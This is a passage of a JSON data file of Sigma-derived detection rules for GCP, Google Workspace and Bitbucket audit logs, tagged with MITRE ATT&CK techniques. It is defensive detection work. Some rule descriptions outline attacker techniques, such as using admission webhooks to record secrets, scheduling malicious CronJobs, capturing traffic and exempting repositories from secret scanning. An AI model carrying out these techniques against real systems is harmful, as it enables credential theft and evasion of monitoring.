environment.", "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", "value": "Google Cloud VPN Tunnel Modified or Deleted" }, { "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-13", "falsepositive": [ "Full Network Packet Capture may be done by a system or network administrator.", "If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "gcp_full_network_traffic_packet_capture.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ "attack.collection", "attack.t1074" ] }, "related": [ { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", "value": "Google Full Network Traffic Packet Capture" }, { "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "gcp_dns_zone_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/dns/docs/reference/v1/managedZones", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", "value": "Google Cloud DNS Zone Modified or Deleted" }, { "description": "Detect when a Cloud SQL DB has been modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-15", "falsepositive": [ "SQL Database being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "SQL Database modified or deleted from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_sql_database_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", "value": "Google Cloud SQL Database Modified or Deleted" }, { "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-25", "falsepositive": [ "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "gcp_kubernetes_admission_controller.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml" ], "tags": [ "attack.persistence", "attack.t1078", "attack.credential-access", "attack.t1552", "attack.t1552.007" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", "value": "Google Cloud Kubernetes Admission Controller" }, { "description": "Identifies when sensitive information is re-identified in google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "gcp_dlp_re_identifies_sensitive_information.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml" ], "tags": [ "attack.impact", "attack.t1565" ] }, "related": [ { "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", "value": "Google Cloud Re-identifies Sensitive Information" }, { "description": "Detects the creation or patching of 
potentially malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-09", "falsepositive": [ "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_rolebinding.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://github.com/elastic/detection-rules/pull/1267", "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", "value": "Google Cloud Kubernetes RoleBinding" }, { "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. 
Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-22", "falsepositive": [ "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_cronjob.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.execution" ] }, "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", "value": "Google Cloud Kubernetes CronJob" }, { "description": "Identifies when a service account is disabled or deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "gcp_service_account_disabled_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", "value": "Google Cloud Service Account Disabled or Deleted" }, { "description": "Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.\n", "meta": { "author": "Bryan Lim", "creation_date": "2024-01-12", "falsepositive": [ "Unknown" ], "filename": "gcp_breakglass_container_workload_deployed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/binary-authorization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "76737c19-66ee-4c07-b65a-a03301d1573d", "value": "GCP Break-glass Container Workload Deployed" }, { "description": "Detects when multi-factor authentication (MFA) is disabled.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-26", "falsepositive": [ "MFA may be disabled and performed by a system administrator." 
], "filename": "gcp_gworkspace_mfa_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml" ], "tags": [ "attack.impact" ] }, "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", "value": "Google Workspace MFA Disabled" }, { "description": "Detects when a role privilege is deleted in Google Workspace.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-24", "falsepositive": [ "Unknown" ], "filename": "gcp_gworkspace_role_privilege_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", "value": "Google Workspace Role Privilege Deleted" }, { "description": "Detects when an application is removed from Google Workspace.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-26", "falsepositive": [ "Application being removed may be performed by a System Administrator." 
], "filename": "gcp_gworkspace_application_removed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_application_removed.yml" ], "tags": [ "attack.impact" ] }, "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", "value": "Google Workspace Application Removed" }, { "description": "Detects when an access level is changed for a Google workspace application.\nAn access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.\nAn adversary would be able to remove access levels to gain easier access to Google workspace resources.\n", "meta": { "author": "Bryan Lim", "creation_date": "2024-01-12", "falsepositive": [ "Legitimate administrative activities changing the access levels for an application" ], "filename": "gcp_gworkspace_application_access_levels_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings", "https://support.google.com/a/answer/9261439", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22f2fb54-5312-435d-852f-7c74f81684ca", "value": "Google 
Workspace Application Access Level Modified" }, { "description": "Detects when an API access service account is granted domain authority.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "gcp_gworkspace_granted_domain_api_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "value": "Google Workspace Granted Domain API Access" }, { "description": "Detects when a Google Workspace user is granted admin privileges.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-23", "falsepositive": [ "Google Workspace admin role privileges may be modified by system administrators." 
], "filename": "gcp_gworkspace_user_granted_admin_privileges.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", "value": "Google Workspace User Granted Admin Privileges" }, { "description": "Detects when a role is modified or deleted in Google Workspace.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-24", "falsepositive": [ "Unknown" ], "filename": "gcp_gworkspace_role_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", "value": "Google Workspace Role Modified or Deleted" }, { "description": "Detects user authentication failure events.\nPlease note that this rule can be noisy and it is recommended to use it with correlation based on the \"author.name\" field.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user wrong password attempts." 
], "filename": "bitbucket_audit_user_login_failure_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70ed1d26-0050-4b38-a599-92c53d57d45a", "value": "Bitbucket User Login Failure" }, { "description": "Detects when secret scanning rule is deleted for the project or repository.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." 
], "filename": "bitbucket_audit_secret_scanning_rule_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff91e3f0-ad15-459f-9a85-1556390c138d", "value": "Bitbucket Secret Scanning Rule Deleted" }, { "description": "Detects global permissions change activity.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_global_permissions_change_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aac6c4f4-87c7-4961-96ac-c3fd3a42c310", "value": "Bitbucket Global Permission Changed" }, { "description": "Detects Bitbucket global SSH access configuration changes.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": 
"2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_global_ssh_settings_change_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.t1562.001", "attack.t1021.004" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16ab6143-510a-44e2-a615-bdb80b8317fc", "value": "Bitbucket Global SSH Settings Changed" }, { "description": "Detects user data export activity.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." 
], "filename": "bitbucket_audit_user_details_export_attempt_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml" ], "tags": [ "attack.collection", "attack.reconnaissance", "attack.discovery", "attack.t1213", "attack.t1082", "attack.t1591.004" ] }, "related": [ { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5259cbf2-0a75-48bf-b57a-c54d6fabaef3", "value": "Bitbucket User Details Export Attempt Detected" }, { "description": "Detects unauthorized access attempts to a resource.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Access attempts to non-existent repositories or due to outdated plugins. Usually \"Anonymous\" user is reported in the \"author.name\" field in most cases." 
], "filename": "bitbucket_audit_unauthorized_access_detected.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml" ], "tags": [ "attack.resource-development", "attack.t1586" ] }, "related": [ { "dest-uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7215374a-de4f-4b33-8ba5-70804c9251d3", "value": "Bitbucket Unauthorized Access To A Resource" }, { "description": "Detects changes to the bitbucket audit log configuration.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_log_configuration_update_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6aa12161-235a-4dfb-9c74-fe08df8d8da1", "value": "Bitbucket Audit Log Configuration Updated" }, { "description": "Detects Bitbucket global secret scanning rule deletion activity.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." 
], "filename": "bitbucket_audit_global_secret_scanning_rule_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", "value": "Bitbucket Global Secret Scanning Rule Deleted" }, { "description": "Detects when full data export is attempted.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." 
], "filename": "bitbucket_audit_full_data_export_triggered.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml" ], "tags": [ "attack.collection", "attack.t1213.003" ] }, "related": [ { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", "value": "Bitbucket Full Data Export Triggered" }, { "description": "Detects when a full data export is attempted by an unauthorized user.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Unlikely" ], "filename": "bitbucket_audit_unauthorized_full_data_export_triggered.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml" ], "tags": [ "attack.collection", "attack.resource-development", "attack.t1213.003", "attack.t1586" ] }, "related": [ { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34d81081-03c9-4a7f-91c9-5e46af625cde", "value": 
"Bitbucket Unauthorized Full Data Export Triggered" }, { "description": "Detects when a secret scanning allowlist rule is added for projects.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_project_secret_scanning_allowlist_added.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42ccce6d-7bd3-4930-95cd-e4d83fa94a30", "value": "Bitbucket Project Secret Scanning Allowlist Added" }, { "description": "Detects SSH user login access failures.\nPlease note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user wrong password attempts." 
], "filename": "bitbucket_audit_user_login_failure_via_ssh_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html", "https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml" ], "tags": [ "attack.t1021.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3f90469-fb05-42ce-b67d-0fded91bbef3", "value": "Bitbucket User Login Failure Via SSH" }, { "description": "Detects when a repository is exempted from secret scanning feature.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." 
], "filename": "bitbucket_audit_secret_scanning_exempt_repository_detected.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b91e8d5e-0033-44fe-973f-b730316f23a1", "value": "Bitbucket Secret Scanning Exempt Repository Added" }, { "description": "Detects user permission data export attempt.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." 
